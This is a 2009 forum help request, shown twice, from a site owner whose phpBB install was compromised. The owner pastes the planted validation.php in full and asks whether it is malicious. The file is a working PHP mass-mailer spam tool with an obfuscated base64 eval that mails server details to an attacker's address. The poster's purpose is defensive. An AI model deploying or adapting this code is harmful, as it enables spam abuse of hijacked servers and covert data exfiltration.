j0rdanda
05-29-2009, 05:54 AM
Hello All,
This forum came highly recommended and I'm glad I found it. Bluehost suspended my account because it has been phished. I'm pretty sure that phpbb is the culprit. Here is code from the validation.php file. Could you tell me if the code near the end is malicious? Or if anything is out of the ordinary?
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>|| InboX Mass Mailer ||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="black" text="#ffffff">
<span class="style1">InboX Mass Mailer<br>
</span>
<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" >
Plain Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your
message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "spammed<br>";
flush();
}
}
$ra44 = rand(1,99999);
$subj98 = "sh-$ra44";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOT gsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
}
?>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<p class="style1">
Copyright © 2007 phpbb.com
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>
Also, I use phpbb 3.0.3. Would simply updating to 3.0.4 reslove the phishing problem? I have disabled the forum temporarily through the forums administration panel though it doesn't seem to have stopped anything.
I am finding odd files showing up under my home directory. These files are empty and are called instaforex, almaforex, liteforex, logintrader, etc... I changed their permissions so that I could delete them, and now they are back in the root directory somehow?
I would love to patch this security hole and would appreciate any help.
My website is http://www.resourcetolife.com.
Thank you for any help,
Jordan
Edit: Something odd happened. When I posted the validation.php here, the code I thought was malicious translated. Here is the malicious code, I thought, outside of code tags.
<p class="style1">
Copyright © 2007 phpbb.com
</p>
The first amount of code translated that to "copyright phhpbb"etc...
Lastly, the strangest incoming link has directed almost 397 clicks to my site. It is an odd link that I didn't create, but it's from my account. I hope all this information helps.
The link: http://74.220.219.56/~resoure0/forum/validation.php
Thank you again,
Jordan
This forum came highly recommended and I'm glad I found it. Bluehost suspended my account because it has been phished. I'm pretty sure that phpbb is the culprit. Here is code from the validation.php file. Could you tell me if the code near the end is malicious? Or if anything is out of the ordinary?
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>|| InboX Mass Mailer ||</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="black" text="#ffffff">
<span class="style1">InboX Mass Mailer<br>
</span>
<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" >
Plain Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your
message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "spammed<br>";
flush();
}
}
$ra44 = rand(1,99999);
$subj98 = "sh-$ra44";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOT gsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
}
?>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<p class="style1">
Copyright © 2007 phpbb.com
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>
Also, I use phpbb 3.0.3. Would simply updating to 3.0.4 reslove the phishing problem? I have disabled the forum temporarily through the forums administration panel though it doesn't seem to have stopped anything.
I am finding odd files showing up under my home directory. These files are empty and are called instaforex, almaforex, liteforex, logintrader, etc... I changed their permissions so that I could delete them, and now they are back in the root directory somehow?
I would love to patch this security hole and would appreciate any help.
My website is http://www.resourcetolife.com.
Thank you for any help,
Jordan
Edit: Something odd happened. When I posted the validation.php here, the code I thought was malicious translated. Here is the malicious code, I thought, outside of code tags.
<p class="style1">
Copyright © 2007 phpbb.com
</p>
The first amount of code translated that to "copyright phhpbb"etc...
Lastly, the strangest incoming link has directed almost 397 clicks to my site. It is an odd link that I didn't create, but it's from my account. I hope all this information helps.
The link: http://74.220.219.56/~resoure0/forum/validation.php
Thank you again,
Jordan